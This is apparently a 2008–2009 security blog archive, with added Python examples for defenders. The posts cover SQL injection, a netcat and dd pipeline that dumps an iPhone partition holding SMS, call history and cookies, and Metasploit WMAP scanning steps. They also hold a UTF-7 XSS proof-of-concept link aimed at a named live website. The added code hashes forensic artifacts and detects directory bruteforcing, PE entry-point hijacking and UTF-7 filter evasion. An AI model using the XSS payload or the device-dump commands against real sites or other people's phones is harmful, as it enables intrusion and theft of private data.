Thursday, February 26, 2009
SQL Queries
SQL injection is still in the top 10 web application security threats for 2009. During my work I'm facing databases that I don't work with on a regular basis, which got me to compile a list of queries for MSSQL, Oracle, MySQL, PostgreSQL and MS Access. In the following xls file you can find the most used SQL injection queries. The list was constructed from data that I picked from several web sites and during the days and nights of /me @work ;)
Tuesday, February 17, 2009
iPhone 2.2 Backup
In order to make a bit-by-bit copy, use the following method:
On your *nix box open up netcat:
nc -lvp 1337 | dd of=./imagem.dmg bs=4096
On your iPhone/ssh execute the following:
dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337
If you want to browse your iPhone contents, look in the following locations:
Calendar /mobile/Library/Calendar/calendar.sqlitedb
Call history /mobile/Library/CallHistory/call_history.db
Notes /mobile/Library/Notes/notes.db
SMS /mobile/Library/SMS/sms.db
Address book /mobile/Library/AddressBook/AddressBook.sqlitedb
Voicemail /var/root/Library/Voicemail/voicemail.db
Photos /mobile/Media/DCIM/
Photos /mobile/Media/Photos
Google Maps /mobile/Library/Caches/MapTiles/MapTiles.sqlitedb
Cookies /mobile/Library/Cookies/Cookies.plist
iPhone Recorder /private/var/mobile/Media/iPhoneRecorder
ג'קי אלטל
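To turn the imaged partition into a defensible evidence set, here is an added Python example (not from the post) that walks the artifact locations listed above inside a mounted copy of the image and records presence, size and SHA-256 for each. It assumes rdisk0s2 is the data partition mounted at /private/var, so the post's /mobile/... paths are mobile/... relative to the image root; make_sample_image builds a constructed stand-in tree rather than a real device image.

```python
import hashlib
import os
import tempfile

# Artifact locations from the post, relative to the root of the imaged partition.
# Assumption: rdisk0s2 is the data partition mounted at /private/var, so the
# post's /mobile/... and /var/root/... paths become mobile/... and root/... here.
IPHONE_ARTIFACTS = {
    "Calendar": "mobile/Library/Calendar/calendar.sqlitedb",
    "Call history": "mobile/Library/CallHistory/call_history.db",
    "Notes": "mobile/Library/Notes/notes.db",
    "SMS": "mobile/Library/SMS/sms.db",
    "Address book": "mobile/Library/AddressBook/AddressBook.sqlitedb",
    "Voicemail": "root/Library/Voicemail/voicemail.db",
    "Photos": "mobile/Media/DCIM",
    "Google Maps": "mobile/Library/Caches/MapTiles/MapTiles.sqlitedb",
    "Cookies": "mobile/Library/Cookies/Cookies.plist",
    "iPhone Recorder": "mobile/Media/iPhoneRecorder",
}

def sha256_file(path):
    with open(path, "rb") as f:  # artifact dbs are small; read whole
        return hashlib.sha256(f.read()).hexdigest()

def inventory(image_root, artifacts=IPHONE_ARTIFACTS):
    """Per artifact: presence, plus size and SHA-256 for files or a file count
    for directories. Hashing at acquisition time lets later analysis prove
    the evidence was not altered."""
    report = {}
    for label, rel in artifacts.items():
        full = os.path.join(image_root, rel)
        entry = {"path": rel, "present": os.path.exists(full)}
        if os.path.isfile(full):
            entry["size"] = os.path.getsize(full)
            entry["sha256"] = sha256_file(full)
        elif os.path.isdir(full):
            entry["files"] = sum(len(fs) for _, _, fs in os.walk(full))
        report[label] = entry
    return report

def make_sample_image():
    """Constructed stand-in for a mounted image: only an SMS db and one photo."""
    root = tempfile.mkdtemp(prefix="iphone_img_")
    for rel, content in (("mobile/Library/SMS/sms.db", b"abc"),
                         ("mobile/Media/DCIM/100APPLE/IMG_0001.JPG", b"\xff\xd8\xff\xd9")):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(content)  # constructed bytes, not real iPhone data
    return root
```

Run inventory() against the real mount point of the .dmg and keep the resulting report with the image; artifacts that are absent are still listed so the gap is documented.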
Advanced Exploitation with Metasploit
I decided to write a post about the new/advanced features in my favorite exploitation framework, Metasploit. The improved tools/features in the advanced framework include wmap (application mapping) and autopwn (what does it sound like?).
WMAP
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."
STEP 1: load sqlite3 database
>load db_sqlite3
STEP 2: Create new database
>db_create wmapjack.db
STEP 3: Load wmap Database
>load db_wmap
STEP 4: Connect to wmap database
>db_connect wmap.db
Now just add the web application target address:
>wmap_targets -a http://127.0.0.1
Set it to the new target with the following command:
>wmap_targets -s 1
wmap_run - execute application mapping

The active modules are:
wmap_ssl_vhost WMAP_SERVER
frontpage_login WMAP_SERVER
version WMAP_SERVER
wmap_vhost_scanner WMAP_SERVER
wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names)
wmap_reports - view web application report

Test your application
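From the defender's side, a wmap_file_same_name_dir run shows up in the web server's access log as a burst of 404s for different directory names from one address. The following added Python example (not part of Metasploit or the original post) parses Apache combined-format lines and flags that pattern; the log lines are constructed samples, and the 60-second window and threshold of 10 are assumed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_dir_bruteforce(lines, window_s=60, threshold=10):
    """Return {ip: max distinct 404 paths seen in any window_s-second window}
    for every IP that reaches threshold: the footprint of a directory guesser
    such as wmap_file_same_name_dir, whose guesses mostly receive 404s."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append((rec["ts"], rec["path"]))
    flagged = {}
    for ip, events in misses.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):  # sliding window over sorted 404s
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            best = max(best, len({p for _, p in events[start:end + 1]}))
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample: one host guessing 12 directory names in 12 seconds, one ordinary visitor.
_GUESSES = ["admin", "backup", "old", "test", "cgi-bin", "db", "include",
            "logs", "private", "tmp", "upload", "_vti_bin"]
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Feb/2009:12:00:%02d +0200] "GET /%s/ HTTP/1.1" 404 209 "-" "Mozilla/4.0"'
    % (i, name) for i, name in enumerate(_GUESSES)
] + [
    '10.0.0.9 - - [26/Feb/2009:12:00:03 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/Feb/2009:12:00:07 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]
```

Feed find_dir_bruteforce() the lines of a real access log to see which sources were guessing; a single missing favicon never crosses the threshold.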
Wednesday, February 11, 2009
BackTrack 4 Beta released
BT4 - new and improved version, the best so far... another great work by the Remote Exploit team, with some new and exciting features. The most significant of these changes is the expansion from the realm of a pentesting LiveCD towards a full-blown "distribution".
DOWNLOAD: BackTrack 4 Beta
Sunday, July 20, 2008
Flow hiJACKing
Application flow hijacking is one of the popular methods for infecting EXE files: using this method one can inject malicious hex-encoded (\x..) code into the application's code section and then point the instruction pointer at it so that it executes as part of the original code. Read more here... hiJACKing
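Because a hijacked flow usually means the header's AddressOfEntryPoint no longer points where the compiler put it, a few header checks catch the common variants (entry point moved into an appended or writable+executable section); an entry point redirected inside the original .text needs comparison against a known-good copy instead. The following added Python example (not from the linked post) parses PE32 headers and applies those checks; build_pe and the SAMPLE_* blobs are constructed header-only fixtures, not real executables.

```python
import struct
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def build_pe(entry_rva, sections):
    """Constructed header-only PE32 for testing; sections = [(name, va, size, flags)]."""
    dos = b"MZ".ljust(60, b"\0") + struct.pack("<I", 64)           # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 9, 0, 0, 0, 0, entry_rva).ljust(224, b"\0")
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), sz, va, sz, 0x400,
                                 0, 0, 0, 0, fl) for n, va, sz, fl in sections)
    return dos + coff + opt + table

def parse_sections(data):
    """Read AddressOfEntryPoint and the section table from the PE headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 60)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]   # optional header + 16
    sections, off = [], pe + 24 + opt_size
    for _ in range(nsec):
        name, size, va, *_rest, flags = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "size": size, "flags": flags})
        off += 40
    return entry, sections

def entry_point_findings(data):
    """Header heuristics for a hijacked entry point; [] means it sits in a normal code section."""
    entry, sections = parse_sections(data)
    home = next((s for s in sections if s["va"] <= entry < s["va"] + s["size"]), None)
    if home is None:
        return ["entry point 0x%x is outside every section" % entry]
    findings = []
    if not home["flags"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
        findings.append("entry point in non-code section %s" % home["name"])
    if home["flags"] & IMAGE_SCN_MEM_WRITE and home["flags"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section %s is writable and executable" % home["name"])
    if len(sections) > 1 and home is sections[-1]:
        findings.append("entry point in last section %s (appended code?)" % home["name"])
    return findings
# Constructed samples: a normal layout, and one whose entry point was moved to an appended W+X section.
TEXT_SECTION = (b".text", 0x1000, 0x2000, 0x60000020)   # code | execute | read
DATA_SECTION = (b".data", 0x3000, 0x1000, 0xC0000040)   # initialized data | read | write
SAMPLE_CLEAN = build_pe(0x1000, [TEXT_SECTION, DATA_SECTION])
SAMPLE_HIJACKED = build_pe(0x4000, [TEXT_SECTION, DATA_SECTION, (b".jack", 0x4000, 0x200, 0xE0000020)])
```

On a real file, pass open(path, "rb").read() to entry_point_findings(); a non-empty list is a reason to diff the binary against a trusted copy, not a verdict on its own.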
Saturday, July 12, 2008
Tools In The Box
New / old applications in the tools section:
Super ShellCode - Superman shellcode soundtrack. Instead of running calc as a shellcode I decided to code my own super rintchi shellcode. Open the file with Olly and copy/use the relevant code as a shellcode.
ShareWatcher - A small .NET application that watches NetBIOS connections to your PC. It will alert on and log all connections.
TrafficViewer - Israeli road cameras (watch 8 cams in one window).
PS: What's that? data = google.doGoogleSearch(query,maxResults=20)
Enjoy.
Tuesday, July 8, 2008
XSS UTF-7
Lament (my best student so far....) discovered a new XSS vulnerability in Apache server (two months ago and still unfixed). Read about cross-site scripting here.
This vulnerability shows us that we can't blindly TRUST links from known domain names. In the following POC we can see that walla.co.il is vulnerable, just like all the other websites running Apache server.
POC
Open a new Explorer window and paste the following link:
http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz
bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM
XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe
Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont
%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--
Next, right click on the page and change the encoding to auto select. BOOM. A message box should open now.
Conclusion: if you receive a long encrypted link, just don't open it. BE AWARE.
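The encoding trick above is why a server-side filter that looks for a literal '<script' misses this payload. The following added Python example (not from the post) shows that filter failing on the UTF-7 form, the same filter passing once the input is decoded first, and a check for the real fix, an explicit charset in the Content-Type header so the browser never auto-detects UTF-7; the payload string is taken from the post's PoC and the helper names are mine.

```python
import re

TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)

# Constructed sample: the UTF-7 spelling used in the post's PoC link.
UTF7_PAYLOAD = "+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4-"

def naive_contains_script(s):
    """Filter that only recognises an ASCII '<': it never sees '+ADw-'."""
    return TAG_RE.search(s) is not None

def decode_utf7(s):
    """Decode UTF-7 the way an auto-detecting browser would; non-ASCII or
    malformed input is returned unchanged."""
    try:
        return s.encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return s

def normalized_contains_script(s):
    """Same filter applied after decoding: now the payload is visible."""
    return naive_contains_script(decode_utf7(s))

def response_charset_ok(headers):
    """Server-side fix: an explicit charset in Content-Type stops the browser
    from guessing the encoding, so the UTF-7 form is never interpreted."""
    return "charset=" in headers.get("Content-Type", "").lower()
```

Decoding before filtering closes the gap for this payload, but declaring the charset on every HTML response is what removes the browser's guess in the first place.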